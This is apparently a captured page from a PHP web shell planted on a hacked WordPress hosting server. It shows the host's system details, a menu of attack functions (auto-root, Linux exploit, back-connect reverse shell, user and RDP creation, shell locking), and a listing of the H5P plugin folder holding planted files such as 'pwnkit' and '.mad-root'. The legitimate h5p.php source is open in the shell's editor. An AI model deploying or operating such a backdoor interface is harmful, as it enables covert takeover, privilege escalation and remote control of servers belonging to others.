Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
h5p /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
h5p-editor-php-library
[ DIR ]
drwxr-xr-x
h5p-php-library
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
public
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
autoloader.php
2.18
KB
-rw-r--r--
h5p.php
1.24
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.txt
23.07
KB
-rw-r--r--
uninstall.php
1.79
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : h5p.php
<?php /** * H5P Plugin. * * Eases the creation and insertion of rich interactive content * into you blog. Find content libraries at http://h5p.org * * @package H5P * @author Joubel <contact@joubel.com> * @license MIT * @link http://joubel.com * @copyright 2014 Joubel * * @wordpress-plugin * Plugin Name: H5P * Plugin URI: http://h5p.org/wordpress * Description: Allows you to upload, create, share and use rich interactive content on your WordPress site. * Version: 1.17.8 * Author: Joubel * Author URI: http://joubel.com * Text Domain: h5p * License: MIT * License URI: http://opensource.org/licenses/MIT * Domain Path: /languages */ // If this file is called directly, abort. if (!defined('WPINC')) { die; } require_once plugin_dir_path(__FILE__) . 'autoloader.php'; // Public-Facing Functionality register_activation_hook(__FILE__, array('H5P_Plugin', 'activate')); register_deactivation_hook( __FILE__, array('H5P_Plugin', 'deactivate')); add_action('plugins_loaded', array('H5P_Plugin', 'get_instance')); // Dashboard and Administrative Functionality if (is_admin()) { add_action('plugins_loaded', array('H5P_Plugin_Admin', 'get_instance')); }
Close